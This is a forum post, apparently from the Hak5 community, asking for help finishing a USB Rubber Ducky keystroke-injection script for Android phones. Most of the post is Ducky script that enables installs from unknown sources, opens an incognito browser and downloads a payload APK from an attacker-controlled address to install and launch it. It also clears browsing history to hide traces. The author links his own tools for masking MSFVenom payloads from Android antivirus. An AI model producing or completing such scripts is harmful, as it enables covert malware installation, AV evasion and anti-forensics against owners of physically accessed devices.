Android Payload Help


n33dsh3llz

Hello Hak5 Community,

Trying to figure out how to download a .apk file, then execute it. I know how to download it, which may be enough. Ideally, the whole process could be 100% automated. Maybe I could just sleep the script, giving the user time to launch manually if there are no hotkeys. I tried opening the downloads inside the browser, but couldn't find a way to select the rows of downloaded files (maybe a security feature). Also, when bringing down the main bar and going to the downloaded file, then launching, it never opened the app other than seeing the AV scan take place.

Note: WINDOWS+N brings down the top slider bar & F10 opens downloads in Chrome. Documents said CTRL+J opened downloads, but it wasn't working for me.

Can't figure out a way to open the downloaded .apk file.

 

 

Here is what I have so far. Keep in mind delays have not been put in yet and this is merely a run-down through using a keyboard:

#Allow unknown sources
ESCAPE #(x whatever for main screen)
WINDOWS+N
UP
ENTER
DOWN ARROW x 6
ENTER
DOWN ARROW x 7
ENTER
RIGHT ARROW
ENTER
ESCAPE #(x whatever to get to main screen)

#Begin the download and install of the payload
WINDOWS+B #Brings up the browser
CNTL+SHIFT+N #Open incognito window (if not chrome, shouldnt do anything)
CNTL+L #Access the URL bar
String http://x.x.x.x:xxxx/payload.apk #types in the file to download
ENTER

** FIGURE OUT WAY TO LAUNCH IT **

TAB
TAB #Places you at INSTALL
ENTER
SLEEP X #Give to install
TAB
TAB 
ENTER #Launch

 

 

Recent scripts I wrote to bypass Android AV:

https://github.com/jbreed/apkwash

https://github.com/jbreed/apkinjector

For this attack, apkwash would be perfect as it would simply mask the small .apk file generated by MSFVenom. Smaller=faster downloading. Maybe a twin-duck for this would work better to install from local media.

 


Ended up finishing the unknown sources setting, but figured it is a waste of time as it can be easily bypassed once attempting to install.

https://github.com/jbreed/usb-ducky-android-download

Here is what I think will work best, as there are so many issues that can arise.

Potential issues:

-Default browser not set to Chrome. ALT d is to get the URL line for "Internet" app. May add this just to make it fail-safe.

-Default browser not set at all. This will simply require pressing the button to relaunch the script as it should have been set with the first run.

 

What would take place after:

Install the apk (bypass untrusted sources, select 'open')

Clear browsing history if default app wasn't Chrome

Delete the downloaded .apk file (if launched with Chrome, then the script below will take you to the screen afterwards)

DELAY 200
REM ----- BACK OUT TO MAIN MENU -----
ESCAPE
ESCAPE
REM ----- OPEN BROWSER ------
GUI b
DELAY 1000
REM ----- Select url bar and navigate -----
CTRL l
ALT d
DELAY 200
STRING example.com
DELAY 250
ENTER
DELAY 250
REM ----- DOWNLOAD HAS BEGUN -----
REM ----- TIME TO INSTALL MANUALLY -----
REM ----- FOR CHROME, CLEARING HISTORY AND OPENING DOWNLOADS -----
CTRL h
DELAY 300
TAB
TAB
TAB
DELAY 10
ENTER
DELAY 100
F10
DELAY 300
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
ENTER

 

Edited by n33dsh3llz
updated